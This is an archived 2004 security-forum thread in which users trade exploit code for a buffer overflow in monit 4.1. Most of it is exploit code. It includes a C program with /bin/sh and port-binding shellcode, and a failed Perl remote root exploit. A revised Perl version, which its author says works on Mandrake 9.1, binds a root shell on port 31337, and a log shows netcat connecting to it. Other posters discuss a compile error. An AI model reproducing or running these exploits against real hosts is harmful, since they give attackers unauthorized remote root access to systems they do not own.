hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Remote Monit Exploit?
GovernmentSecurity.org > The Archives > Exploit Articles
gsicht
Apr 8 2004, 11:44 AM
is there a remote root exploit for monit 4.1?
i also wrote an exploit for this vuln, but it works only for a dos attack.

advisory:
www.securityfocus.com/archive/1/359498/2004-04-05/2004-04-11/0
CODE

/* remote monit dos exploit -gsicht */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define RET 0xbffff830

char shellcode[] =
"\xeb\x18\x5d\x31\xc0\x88\x45\x07\x89\x6d\x08\x89\x45"
"\x0c\xb0\x0b\x89\xeb\x8d\x4d\x08\x8d\x55\x0c\xcd\x80"
"\xe8\xe3\xff\xff\xff/bin/sh";

/*
char shellcode[] = // 8 + 88 = 96 bytes portbind 31337
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
"\x89\xc7\x52\x66\x68"
"\x7a\x69" // port 31337/tcp, change if needed
"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80"
"\xb0\x66\xb3\x04\xcd\x80"
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80"
"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80"
"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";
*/

int main(int argc, char *argv[])
{

int offset,sock,k,i;
char buffer[350];
char answer[1024];
fd_set fds,rfds;

if(argc < 2)
{
 printf("\nusage: %s [ip] [port] <offset>\n\n",argv[0]);
 return 0;
}

if(argv[3] == NULL)
{
 offset = 100;
}
else
{
 offset = atoi(argv[3]);
}

long ret = RET + offset;

memset(buffer,NOP,300);
// memcpy(buffer+275-strlen(shellcode),shellcode,strlen(shellcode));
memcpy(buffer+284,&ret,4);

printf("Offset:\t\t\t%d\n",offset);
printf("Returnaddress:\t\t%p\n",ret);
printf("size of shellcode:\t%d bytes\n\n",strlen(shellcode));

struct sockaddr_in target;

sock = socket(AF_INET, SOCK_STREAM, 0);

target.sin_family = AF_INET;
target.sin_port = htons(atoi(argv[2]));
target.sin_addr.s_addr = inet_addr(argv[1]);

printf("connecting to %s:%d...\n",argv[1],atoi(argv[2]));
if(connect(sock, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0)
{
 printf("connect error!\n\n");
 exit(-1);
}
else printf("connected\n");
sleep(1);
printf("sending string...\n\n");
puts(buffer);

write(sock,buffer,strlen(buffer));
sleep(2);

FD_ZERO(&rfds);
FD_SET(0,&rfds);
FD_SET(sock,&rfds);

while(1)
{
 memcpy(&fds,&rfds,sizeof(rfds));
 i=select(sock+1,&fds,NULL,NULL,NULL);
 if(i==0)
 exit(0);
 if(i<0)
 {
  perror("select");
  exit(1);
 }

 if(FD_ISSET(sock,&fds))
 {
  i=read(sock,answer,1024);
  if(i<1)
  {
   printf("session closed\n");
   exit(0);
  }
  write(1,answer,i);
 }

 if(FD_ISSET(0,&fds))
 {
  i=read(0,answer,1024);
  if(i<1)
  {
   printf("session closed\n");
   exit(0);
  }
  write(sock,answer,i);
 }
}

close(sock);
}
Paul
Apr 8 2004, 04:26 PM
QUOTE (gsicht @ Apr 8 2004, 11:44 AM)
is there a remote root exploit for monit 4.1?
i also wrote an exploit for this vuln, but it works only for a dos attack.

advisory:
www.securityfocus.com/archive/1/359498/2004-04-05/2004-04-11/0
CODE

char shellcode[] =
"\xeb\x18\x5d\x31\xc0\x88\x45\x07\x89\x6d\x08\x89\x45"
"\x0c\xb0\x0b\x89\xeb\x8d\x4d\x08\x8d\x55\x0c\xcd\x80"
"\xe8\xe3\xff\xff\xff/bin/sh";

/*
char shellcode[] = // 8 + 88 = 96 bytes portbind 31337
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
"\x89\xc7\x52\x66\x68"
"\x7a\x69" // port 31337/tcp, change if needed
"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80"
"\xb0\x66\xb3\x04\xcd\x80"
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80"
"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80"
"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";
*/

err ?
T3cHn0b0y
Apr 8 2004, 07:57 PM
is 0x90 the hex value for NOP in Intel processors? I get a compile error because the word NOP is used as an argument of a function...the writer obviously didnt use gcc to compile this unsure.gif

QUOTE
memset(buffer,NOP,300);


That's the bit...and if it is 0x90 then how should it be inserted? "0x90" or "\0x90" or "0x90\"?

Any help would be appreciated.
BlaStA
Apr 8 2004, 08:25 PM
I think it should be written "\x90".

Paul: I had the same thoughts like you. dry.gif
gsicht
Apr 9 2004, 10:05 AM
ok, i tried to write a remote root exploit. it also don't work for me. let's make it better. if there's someone who has more kmowledge than i, please help!
CODE

#!/usr/bin/perl
#
# monit <= 4.1 remote root exploit(doesn't work)
# coded by gsicht
#

use IO::Socket::INET;
$socket = 0;

my $shellcode = # 8 + 88 = 96 bytes portbind 31337
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" .
"\x89\xc7\x52\x66\x68" .
"\x7a\x69" . # port 31337/tcp, change if needed
"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" .
"\xb0\x66\xb3\x04\xcd\x80" .
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" .
"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" .
"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";


print "\nmonit 4.1 dos exploit\n";
print "coded by gsicht\n\n";

if(@ARGV<1)
{
print "Usage: perl agate.pl <target>\n\n";
exit(0);
}

print "HOST:\t$ARGV[0]\n";
print "PORT:\t2812\n";

my $buffer = 0x90 x 282 . "\xEB\x04" . "\xE0\x88\xB3\x40" . 0x90 x 10 . $shellcode; # esp mandrake 9.1
#my $buffer = "A" x 284 . "XXXX" . "B" x 100; #dos and debug

print "connecting to server...\n";

$socket = IO::Socket::INET -> new( PeerAddr => $ARGV[0],
    PeerPort => 2812,
    Proto    => "tcp");
if(!defined($socket))
{
print "could not connect :-P\n";
sleep(1);
exit(0);
}

print "connected\n";
sleep(1);
print "sending string\n";
print $socket $buffer;

close $socket;
print "\ndosed!\n";

what's wrong with this code??? wrong jumpaddress?
gsicht
Apr 9 2004, 10:58 AM
oh yeah, this one works on mandrake 9.1
CODE

#!/usr/bin/perl
#
# monit <= 4.1 remote root exploit
# coded by gsicht (09.04.04
#

use IO::Socket::INET;
$socket = 0;

my $shellcode = # 8 + 88 = 96 bytes portbind 31337
"\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" .
"\x89\xc7\x52\x66\x68" .
"\x7a\x69" . # port 31337/tcp, change if needed
"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" .
"\xb0\x66\xb3\x04\xcd\x80" .
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" .
"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" .
"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";


print "\nmonit 4.1 dos exploit\n";
print "coded by gsicht\n\n";

if(@ARGV<1)
{
print "Usage: perl agate.pl <target>\n\n";
exit(0);
}

print "HOST:\t$ARGV[0]\n";
print "PORT:\t2812\n";


my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; # esp mandrake 9.1
#my $buffer = "A" x 284 . "XXXX" . "B" x 100; #dos and debug

print "connecting to server...\n";

$socket = IO::Socket::INET -> new( PeerAddr => $ARGV[0],
    PeerPort => 2812,
    Proto    => "tcp");
if(!defined($socket))
{
print "could not connect :-P\n";
sleep(1);
exit(0);
}

print "connected\n";
sleep(1);
print "sending string\n";
print $socket $buffer;

close $socket;
print "\ndosed!\n";

QUOTE

[done@localhost done]$ perl -w monit.pl 127.1

monit 4.1 dos exploit
coded by gsicht

HOST:  127.1
PORT:  2812
connecting to server...
connected
sending string

dosed!
[done@localhost done]$ nc -v localhost 31337
localhost [127.0.0.1] 31337 (?) open
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.